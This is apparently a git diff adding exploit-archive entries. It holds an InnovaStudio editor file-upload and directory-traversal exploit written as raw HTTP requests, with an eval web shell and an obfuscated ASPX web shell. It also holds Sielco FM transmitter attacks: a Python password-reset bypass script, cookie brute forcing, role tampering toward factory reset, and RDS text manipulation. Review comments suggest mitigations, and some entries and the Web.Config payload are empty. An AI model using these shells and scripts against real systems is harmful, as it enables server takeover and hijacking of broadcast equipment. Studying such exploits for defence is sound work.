diff --git a/exploits/asp/webapps/51362.txt b/exploits/asp/webapps/51362.txt
new file mode 100644
index 000000000..586357f58
--- /dev/null
+++ b/exploits/asp/webapps/51362.txt
@@ -0,0 +1,330 @@
+# Exploit Title: InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal
+# Date: 11/04/2023
+# Exploit Author: Zer0FauLT [admindeepsec@proton.me]
+# Vendor Homepage: innovastudio.com
+# Product: Asset Manager
+# Version: <= Asset Manager ASP Version 5.4
+# Tested on: Windows 10 and Windows Server 2019
+# CVE : 0DAY
+
+##################################################################################################
+# #
+# ASP version, in i_upload_object_FSO.asp, line 234 #
+# #
+# oUpload.AllowedTypes = "gif|jpg|png|wma|wmv|swf|doc|zip|pdf|txt" #
+# #
+##################################################################################################
+||==============================================================================||
+|| ((((1)))) ||
+|| ||
+|| ...:::We Trying Upload ASP-ASPX-PHP-CER-OTHER SHELL FILE EXTENSIONS:::... ||
+||==============================================================================||
+##################################################################################################
+" "
+" FILE PERMISSIONS : [ 0644 ] "
+" "
+" DIR PERMISSIONS : [ 0755 ] "
+" "
+" UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
+" "
+##################################################################################################
+
+==================================================================================================
+
+POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
+Host: www.pentest.com
+Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
+Content-Length: 473
+Cache-Control: max-age=0
+Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Windows"
+Upgrade-Insecure-Requests: 1
+Origin: https://www.pentest.com
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+Content-Disposition: form-data; name="inpCurrFolder2"
+
+C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+Content-Disposition: form-data; name="inpFilter"
+
+
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+Content-Disposition: form-data; name="File1"; filename="shell.asp"
+Content-Type: application/octet-stream
+
+<%eval request("#11")%>
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
+
+==================================================================================================
+" ...[ RESPONCE ]... "
+" "
+" ASP-ASPX-PHP-CER-OTHER FILE EXTENSIONS to types is not allowed. "
+" "
+==================================================================================================
+
+ ***
+
+||================================================================================||
+|| ((((2)))) ||
+|| ||
+|| ...:::Now we will manipulate the filename: ===>>> filename="shell.asp":::... ||
+|| ||
+||================================================================================||
+##################################################################################################
+" "
+" FILE PERMISSIONS : [ 0644 ] "
+" "
+" DIR PERMISSIONS : [ 0755 ] "
+" "
+" UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
+" "
+##################################################################################################
+
+==================================================================================================
+
+POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
+Host: www.pentest.com
+Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
+Content-Length: 473
+Cache-Control: max-age=0
+Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Windows"
+Upgrade-Insecure-Requests: 1
+Origin: https://www.pentest.com
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+Content-Disposition: form-data; name="inpCurrFolder2"
+
+C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+Content-Disposition: form-data; name="inpFilter"
+
+
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+Content-Disposition: form-data; name="File1"; filename="shell.asp%00asp.txt"
+Content-Type: application/octet-stream
+
+<%eval request("#11")%>
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
+
+==================================================================================================
+" >>> filename="shell.asp%00asp.txt" <<< "
+" "
+" [ %00 ] ===> We select these values > Right Click > Convert Selecetion > URL > URL-decode "
+" "
+" or "
+" "
+" CTRL+Shift+U "
+" "
+" SEND! "
+" "
+==================================================================================================
+" ...[ RESPONCE ]... "
+" "
+" OK! "
+" "
+" UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets\shell.asp ] "
+" "
+" SHELL PATH: https://www.pentest.com/editor/assets/shell.asp/aspx/php/cer/[Unrestricted] "
+" "
+==================================================================================================
+
+ ***
+
+||==============================================================================||
+|| ((((3)))) ||
+|| ||
+|| ...:::NO WRITE PERMISSION!:::... ||
+|| ||
+|| ...:::Directory Traversal:::... ||
+|| ||
+||==============================================================================||
+##################################################################################################
+" "
+" FILE PERMISSIONS : [ 0600 ] "
+" "
+" DEFAULT DIR[\Editor\assets] PERMISSIONS : [ 0700 ] "
+" "
+" OTHER[App_Data] DIR PERMISSIONS : [ 0777 ] "
+" "
+" DEFAULT FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
+" "
+" App_Data FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data ] "
+" "
+" TEST WORK DIR : https://www.pentest.com/App_Data <<<= [ 404 ERROR - N/A ] "
+" "
+" "
+##################################################################################################
+##########################################################################################################################################################
+# #
+# What is the App_Data Folder useful? #
+# App_Data contains application data files including .mdf database files, XML files, and other data store files. #
+# The App_Data folder is used by ASP.NET to store an application's local database, such as the database for maintaining membership and role information. #
+# The App_Data folder is not public like the other website directories under the Home Directory. #
+# Because it's a private directory, the IIS server hides it for security reasons. #
+# Now, we will test whether such a directory exists. #
+# If the directory exists, we will make it public so that we can define the necessary server functions for running a shell within it. #
+# For this we will try to load a special server configuration file. This is a Web.Config file. With this we'll ByPass the directory privacy. #
+# So the directory will be public and it will be able to respond to external queries and run a shell. #
+# #
+##########################################################################################################################################################
+==================================================================================================
+
+POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
+Host: www.pentest.com
+Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
+Content-Length: 473
+Cache-Control: max-age=0
+Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Windows"
+Upgrade-Insecure-Requests: 1
+Origin: https://www.pentest.com
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+Content-Disposition: form-data; name="inpCurrFolder2"
+
+C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+Content-Disposition: form-data; name="inpFilter"
+
+
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+Content-Disposition: form-data; name="File1"; filename="Web.Config%00net.txt"
+Content-Type: application/octet-stream
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
+
+==================================================================================================
+" ...[ RESPONCE ]... "
+" "
+" OK! "
+" "
+" UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\Web.Config ] "
+" "
+" TEST WORK for App_Data DIR : https://www.pentest.com/App_Data <<<= [ 403 ERROR - OK. ] "
+" "
+==================================================================================================
+# Now we will upload your shell to the directory where we made ByPass. #
+==================================================================================================
+POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
+Host: www.pentest.com
+Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
+Content-Length: 473
+Cache-Control: max-age=0
+Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Windows"
+Upgrade-Insecure-Requests: 1
+Origin: https://www.pentest.com
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+Content-Disposition: form-data; name="inpCurrFolder2"
+
+C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+Content-Disposition: form-data; name="inpFilter"
+
+
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+Content-Disposition: form-data; name="File1"; filename="shell.aspx%00aspx.txt"
+Content-Type: application/octet-stream
+
+<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %>
+<%var PAY:String=
+Request["\x61\x62\x63\x64"];eval
+(PAY,"\x75\x6E\x73\x61"+
+"\x66\x65");%>
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
+
+======================================================================================================
+" ...[ RESPONCE ]... "
+" "
+" OK! "
+" "
+" UPLOADED FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\shell.aspx ] "
+" "
+" TEST WORK for Shell : https://www.pentest.com/App_Data/shell.aspx <<<= [ OK. ] "
+" "
+==========================================================================================================================================
+" "
+" So what can we do if no directory on the site has write permission? "
+" If not, we will test for vulnerabilities in the paths of other applications running on the server. "
+" Sometimes this can be a mail service related vulnerability, "
+" Sometimes also it can be a "Service Permissions" vulnerability. "
+" Sometimes also it can be a "Binary Permissions " vulnerability. "
+" Sometimes also it can be a "Weak Service Permissions" vulnerability. "
+" Sometimes also it can be a "Unquoted Service Path" vulnerability. "
+" Our limits are as much as our imagination... "
+" *** 0DAY *** "
+" Ok. Now we will strengthen our lesson by exemplifying a vulnerability in the SmarterMail service. "
+" We saw that the SmarterMail service was installed on our IIS server and we detected a critical security vulnerability in this service. "
+" TEST WORK for SmarterMail Service: [ http://mail.pentest.com/interface/root#/login ] "
+" Data directory for this SmarterMail: [ C:\Program Files (x86)\SmarterTools\SmarterMail\MRS\App_Data ] "
+" As shown above, we can first navigate to the App_Data directory belonging to the SmarterMail service, "
+" And then upload our shell file to the server by bypassing it. "
+" This way, we will have full control over both the server and the mail service. "
+" Shell Path: [ http://mail.pentest.com/App_Data/shell.aspx ] "
+" "
+==========================================================================================================================================
\ No newline at end of file
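Review bot: The write-up ends at the successful uploads and never states which server-side checks fail or how to fix them, which is the part a defender needs. From the captures it appears that the `AllowedTypes` list quoted from `i_upload_object_FSO.asp` is matched against the text after the NUL byte in `filename` while the file is stored under the text before it, and that `inpCurrFolder2` is accepted from the client as an absolute path. A closing section should say so (hedged if unconfirmed) and list the mitigations: reject filenames containing NUL or other control characters, take the extension from the name that is actually written, resolve the target folder on the server against a fixed asset root, and disable script handlers in upload directories. The body of the `Web.Config` part (between its `Content-Type` line and the closing boundary) is empty in this file, so the claimed configuration change cannot be assessed. The `Cookie:` values in all four requests look like captured session identifiers and would be better as placeholders such as `ASPSESSIONID<redacted>`, and `Content-Length: 473` is repeated on four different bodies.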
diff --git a/exploits/hardware/remote/51366.txt b/exploits/hardware/remote/51366.txt
new file mode 100644
index 000000000..f93b255b0
--- /dev/null
+++ b/exploits/hardware/remote/51366.txt
@@ -0,0 +1,74 @@
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/hardware/webapps/51363.txt b/exploits/hardware/webapps/51363.txt
new file mode 100644
index 000000000..554a61ece
--- /dev/null
+++ b/exploits/hardware/webapps/51363.txt
@@ -0,0 +1,59 @@
+## Exploit Title: Sielco Analog FM Transmitter 2.12 - 'id' Cookie Brute Force Session Hijacking
+## Exploit Author: LiquidWorm
+
+Vendor: Sielco S.r.l
+Product web page: https://www.sielco.org
+Affected version: 2.12 (EXC5000GX)
+ 2.12 (EXC120GX)
+ 2.11 (EXC300GX)
+ 2.10 (EXC1600GX)
+ 2.10 (EXC2000GX)
+ 2.08 (EXC1600GX)
+ 2.08 (EXC1000GX)
+ 2.07 (EXC3000GX)
+ 2.06 (EXC5000GX)
+ 1.7.7 (EXC30GT)
+ 1.7.4 (EXC300GT)
+ 1.7.4 (EXC100GT)
+ 1.7.4 (EXC5000GT)
+ 1.6.3 (EXC1000GT)
+ 1.5.4 (EXC120GT)
+
+Summary: Sielco designs and produces FM radio transmitters
+for professional broadcasting. The in-house laboratory develops
+standard and customised solutions to meet all needs. Whether
+digital or analogue, each product is studied to ensure reliability,
+resistance over time and a high standard of safety. Sielco
+transmitters are distributed throughout the world and serve
+many radios in Europe, South America, Africa, Oceania and China.
+
+Desc: The Cookie session ID 'id' is of an insufficient length and
+can be exploited by brute force, which may allow a remote attacker
+to obtain a valid session, bypass authentication and manipulate
+the transmitter.
+
+Tested on: lwIP/2.1.1
+ Web/3.0.3
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2023-5758
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5758.php
+
+
+26.01.2023
+
+--
+
+
+# Session values (len=5)
+
+Cookie: id=44189
+Cookie: id=37692
+Cookie: id=+6638
+Cookie: id=+3077
+...
+...
\ No newline at end of file
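Review bot: The Desc says the `id` cookie is of insufficient length, but the advisory records neither the character set nor any fix, so a reader cannot size the risk or act on it. The samples under `# Session values (len=5)` include `+6638` and `+3077`, which suggests a sign-padded decimal number rather than five arbitrary characters; the text should state that explicitly, hedged if it is only inferred from the samples. I would add a remediation line such as `Fix: issue session identifiers from a CSPRNG with at least 128 bits, expire them server-side, and throttle requests carrying unknown ids`. The same gap (no vendor status, fixed firmware or workaround) applies to the other Sielco entries in this commit, 51367.py and 51368.txt through 51371.txt.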
diff --git a/exploits/hardware/webapps/51364.txt b/exploits/hardware/webapps/51364.txt
new file mode 100644
index 000000000..d5b38de08
--- /dev/null
+++ b/exploits/hardware/webapps/51364.txt
@@ -0,0 +1,80 @@
+
+
+
+CSRF Add Admin:
+---------------
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/hardware/webapps/51365.txt b/exploits/hardware/webapps/51365.txt
new file mode 100644
index 000000000..23f956afd
--- /dev/null
+++ b/exploits/hardware/webapps/51365.txt
@@ -0,0 +1,75 @@
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/hardware/webapps/51367.py b/exploits/hardware/webapps/51367.py
new file mode 100755
index 000000000..bf65c3ee4
--- /dev/null
+++ b/exploits/hardware/webapps/51367.py
@@ -0,0 +1,105 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit
+## Exploit Author: LiquidWorm
+#
+#
+# Sielco PolyEco Digital FM Transmitter 2.0.6 Authentication Bypass Exploit
+#
+#
+# Vendor: Sielco S.r.l
+# Product web page: https://www.sielco.org
+# Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
+# PolyEco1000 CPU:1.9.4 FPGA:10.19
+# PolyEco1000 CPU:1.9.3 FPGA:10.19
+# PolyEco500 CPU:1.7.0 FPGA:10.16
+# PolyEco300 CPU:2.0.2 FPGA:10.19
+# PolyEco300 CPU:2.0.0 FPGA:10.19
+#
+# Summary: PolyEco is the innovative family of high-end digital
+# FM transmitters of Sielco. They are especially suited as high
+# performance power system exciters or compact low-mid power
+# transmitters. The same cabinet may in fact be fitted with 50,
+# 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
+# 1000).
+#
+# All features can be controlled via the large touch-screen display
+# 4.3" or remotely. Many advanced features are inside by default
+# in the basic version such as: stereo and RDS encoder, audio
+# change-over, remote-control via LAN and SNMP, "FFT" spectral
+# analysis of the audio sources, SFN synchronization and much more.
+#
+# Desc: The application suffers from an authentication bypass and
+# account takeover/lockout vulnerability that can be triggered by
+# directly calling the users object and effectively modifying the
+# password of the two constants user/role (user/admin). This can
+# be exploited by an unauthenticated adversary by issuing a single
+# POST request to the vulnerable endpoint and gain unauthorized
+# access to the affected device with administrative privileges.
+#
+# Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# Macedonian Information Security Research and Development Laboratory
+# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
+#
+#
+# Advisory ID: ZSL-2023-5769
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5769.php
+#
+#
+# 26.01.2023
+#
+#
+
+
+import requests
+print( '''
+ .- _ _ -.
+ / / \\ \\
+ ( ( (` (-o-) `) ) )
+ \ \_ ` -+- ` _/ /
+ `- -+- -`
+ -+-
+ -+-
+ -+-
+ -+-
+ -+-
+ -+-
+ / \\
+ *****************************************************
+ ! Sielco PolyEco Authentication Bypass Script !
+ *****************************************************
+
+ Please note that this script is for educational and
+ ethical purposes only. Using it for unauthorized
+ access or malicious activities is strictly prohibited
+ and can have serious legal and ethical consequences.
+ The responsibility of using this script in a lawful
+ and ethical manner lies solely with the user. The
+ author or creator of this script shall not be held
+ responsible for any unlawful or unethical activities
+ performed by the users.
+''' )
+url = input( ' Enter the URL (e.g. http://host:8090): ' )
+if not 'http' in url :
+ url = 'http://{}'.format( url )
+user = input( ' Enter the desired role (e.g. user or admin): ')
+if user not in [ 'user', 'admin' ] :
+ exit( ' Only \'user\' or \'admin\' please.' )
+password = input( ' Enter the desired password: ' )
+end = '/protect/users.htm'
+payload = {}
+if user == "user" :
+ payload[ 'pwd_admin' ] = ''
+ payload[ 'pwd_user' ] = password
+elif user == 'admin' :
+ payload[ 'pwd_admin' ] = password
+ payload[ 'pwd_user' ] = ''
+r = requests.post( url + end, data = payload )
+if r.status_code == 200 :
+ print( '\n MSG: OK.' )
+else:
+ print( '\n MSG: ERROR!' )
\ No newline at end of file
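Review bot: The payload always submits the other role's field as an empty string (`payload[ 'pwd_admin' ] = ''` in the `user` branch, `payload[ 'pwd_user' ] = ''` in the `admin` branch), and nothing in the script or its header says what the device does with an empty value. Since the header itself mentions lockout, an authorised tester needs that stated before running this against equipment in service; add a comment above the branch such as `# NOTE: the field for the other role is sent empty; its effect on that account is not verified here`. The same applies to the curl line in 51371.txt, which sends `pwd_user=` empty. Separately, the banner line beginning `\ \_` uses single backslashes in a non-raw string while the neighbouring lines use `\\`; those are invalid escape sequences that newer Python versions warn about, so they should be doubled as well.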
diff --git a/exploits/hardware/webapps/51368.txt b/exploits/hardware/webapps/51368.txt
new file mode 100644
index 000000000..cf6aad443
--- /dev/null
+++ b/exploits/hardware/webapps/51368.txt
@@ -0,0 +1,88 @@
+## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset
+## Exploit Author: LiquidWorm
+
+Vendor: Sielco S.r.l
+Product web page: https://www.sielco.org
+Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
+ PolyEco1000 CPU:1.9.4 FPGA:10.19
+ PolyEco1000 CPU:1.9.3 FPGA:10.19
+ PolyEco500 CPU:1.7.0 FPGA:10.16
+ PolyEco300 CPU:2.0.2 FPGA:10.19
+ PolyEco300 CPU:2.0.0 FPGA:10.19
+
+Summary: PolyEco is the innovative family of high-end digital
+FM transmitters of Sielco. They are especially suited as high
+performance power system exciters or compact low-mid power
+transmitters. The same cabinet may in fact be fitted with 50,
+100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
+1000).
+
+All features can be controlled via the large touch-screen display
+4.3" or remotely. Many advanced features are inside by default
+in the basic version such as: stereo and RDS encoder, audio
+change-over, remote-control via LAN and SNMP, "FFT" spectral
+analysis of the audio sources, SFN synchronization and much more.
+
+Desc: Improper access control occurs when the application provides
+direct access to objects based on user-supplied input. As a result
+of this vulnerability attackers can bypass authorization and access
+resources behind protected pages.
+
+Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+Macedonian Information Security Research and Development Laboratory
+Zero Science Lab - https://www.zeroscience.mk - @zeroscience
+
+
+Advisory ID: ZSL-2023-5768
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5768.php
+
+
+26.01.2023
+
+--
+
+
+index.htm:
+----------
+54: function dologin() {
+55: var hash = hex_md5($('#password').val() + id);
+56: $.get('/login.cgi', {
+57: user: $('#user').val(),
+58: password: hash,
+59: id: id
+60: }).done(function (data) {
+61: var dati = $.parseXML(data);
+62: id = $(dati).find('id').text();
+63: user = $(dati).find('u').text();
+64: if (id == 0)
+65: window.location.href = '/index.htm';
+66: else {
+67: scriviCookie('polyeco', id, 180);
+68: if (user >= 3)
+69: window.location.href = '/protect/factory.htm';
+70: else
+71: window.location.href = '/protect/index.htm';
+72: }
+73: });
+74: }
+
+
+The function 'dologin()' in index.htm is called when a user submits a login form.
+It starts by calculating a hash of the user-entered password and a variable 'id'
+using the hex_md5 function. Then it makes an HTTP GET request to the 'login.cgi'
+endpoint with the user's entered username, the calculated password hash and the
+'id' variable as parameters. If the request is successful, the function parses the
+XML data returned from the server, extracting the values of the 'id' and 'u' elements.
+Then it checks the value of the 'id' variable, if it's equal to 0 then it redirects
+the user to '/index.htm', otherwise, it writes a cookie called 'polyeco' with the
+value of 'id' and expires after 180 days.
+
+After that it checks the value of the 'user' variable, if it's greater than or equal
+to 3, it redirects the user to '/protect/factory.htm', otherwise it redirects the
+user to '/protect/index.htm'. An attacker can exploit this by modifying the client-side
+JavaScript to always set the 'user' variable to a high value (4), or by tampering with
+the data sent to the server during the login process to change the value of the 'user'
+variable. It also works if the server's response variable 'user' is modified.
\ No newline at end of file
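Review bot: The closing explanation mixes up two different values named `user`: the `user` sent to `/login.cgi` on line 57 of the excerpt is the username field, while the `user` compared with 3 on line 68 is the `u` element read from the server's XML reply on line 63. The sentence about tampering with the data sent to the server to change the `user` variable should therefore refer to the response, not the request. It would also help to state the defect from a defender's view: lines 68-71 only choose where the browser navigates, so the underlying issue is presumably that `/protect/factory.htm` is served without a server-side role check on the session, and the fix belongs in the firmware's request handler rather than in `index.htm`. The "180 days" expiry is inferred from `scriviCookie('polyeco', id, 180)`; the unit is not visible in the excerpt and should be hedged.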
diff --git a/exploits/hardware/webapps/51369.txt b/exploits/hardware/webapps/51369.txt
new file mode 100644
index 000000000..8e3e65c94
--- /dev/null
+++ b/exploits/hardware/webapps/51369.txt
@@ -0,0 +1,118 @@
+## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation
+## Exploit Author: LiquidWorm
+
+
+Vendor: Sielco S.r.l
+Product web page: https://www.sielco.org
+Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
+ PolyEco1000 CPU:1.9.4 FPGA:10.19
+ PolyEco1000 CPU:1.9.3 FPGA:10.19
+ PolyEco500 CPU:1.7.0 FPGA:10.16
+ PolyEco300 CPU:2.0.2 FPGA:10.19
+ PolyEco300 CPU:2.0.0 FPGA:10.19
+
+Summary: PolyEco is the innovative family of high-end digital
+FM transmitters of Sielco. They are especially suited as high
+performance power system exciters or compact low-mid power
+transmitters. The same cabinet may in fact be fitted with 50,
+100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
+1000).
+
+All features can be controlled via the large touch-screen display
+4.3" or remotely. Many advanced features are inside by default
+in the basic version such as: stereo and RDS encoder, audio
+change-over, remote-control via LAN and SNMP, "FFT" spectral
+analysis of the audio sources, SFN synchronization and much more.
+
+Desc: Improper access control occurs when the application provides
+direct access to objects based on user-supplied input. As a result
+of this vulnerability attackers can bypass authorization and access
+resources behind protected pages. The application interface allows
+users to perform certain actions via HTTP requests without performing
+any validity checks to verify the requests. This can be exploited
+to perform certain actions and manipulate the RDS text display.
+
+Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+Macedonian Information Security Research and Development Laboratory
+Zero Science Lab - https://www.zeroscience.mk - @zeroscience
+
+
+Advisory ID: ZSL-2023-5767
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5767.php
+
+
+26.01.2023
+
+--
+
+
+POST /protect/rds.htm HTTP/1.1
+Host: RADIOFM
+
+rds_inta=1
+rds_intb=0
+rds_pi=381
+rds_ps=ZSL
+rds_rta=www.zeroscience.mk
+rds_rtb
+rds_rtt=0
+rds_tp=0
+rds_tp=1
+rds_ta=0
+rds_ms=0
+rds_pty=4
+rds_ptyn=
+rds_ecc=00
+rds_ct=0
+rds_level=90
+rds_psd=0
+rds_psd1
+rds_pst1=0
+rds_psd5
+rds_pst5=0
+rds_psd2
+rds_pst2=0
+rds_psd6
+rds_pst6=0
+rds_psd3
+rds_pst3=0
+rds_psd7
+rds_pst7=0
+rds_psd4
+rds_pst4=0
+rds_psd8
+rds_pst8=0
+rds_di_pty=0
+rds_di_cmp=0
+rds_di_cmp=1
+rds_di_st=0
+rds_di_art=0
+rds_di_art=1
+a0=90
+a1=9
+a2=26
+a3=115
+a4=0
+a5=0
+a6=0
+a7=0
+a8=0
+a9=0
+a10=0
+a11=0
+a12=0
+a13=0
+a14=0
+a15=0
+a16=0
+a17=0
+a18=0
+a19=0
+a20=0
+a21=0
+a22=0
+a23=0
+a24=0
\ No newline at end of file
